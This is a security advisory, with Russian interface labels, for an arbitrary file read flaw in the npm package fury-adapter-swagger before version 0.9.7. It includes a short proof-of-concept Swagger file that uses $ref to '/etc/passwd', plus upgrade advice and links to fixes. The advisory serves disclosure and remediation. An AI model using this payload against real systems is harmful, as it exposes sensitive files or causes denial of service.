Описание
fury-adapter-swagger allows arbitrary file read from system
fury-adapter-swagger from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files off of the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like /dev/zero.
Proof of Concept:
---
swagger: '2.0'
info:
title: Read local files
version: '1.0'
paths:
/foo:
get:
responses:
200:
description: Some description
examples:
text/html:
example:
$ref: '/etc/passwd'
Recommendation
Upgrade to version 0.9.7 or later.
Ссылки
- https://github.com/apiaryio/fury-adapter-swagger/pull/89
- https://github.com/apiaryio/fury-adapter-swagger/commit/777e2d68f03546a88f3203bbd4725df8b1f662a7
- https://github.com/apiaryio/fury-adapter-swagger/commit/f4407e3a5323bc31123d45dbc93b8417002e4d51#diff-54c345dc104dc19440f9c2482b7883df820e8b9b699fdd8fa07e2773e7197a29
- https://security.snyk.io/vuln/npm:fury-adapter-swagger:20161024
- https://www.npmjs.com/advisories/305
Пакеты
Наименование
fury-adapter-swagger
npm
Затронутые версииВерсия исправления
>= 0.2.0, < 0.9.7
0.9.7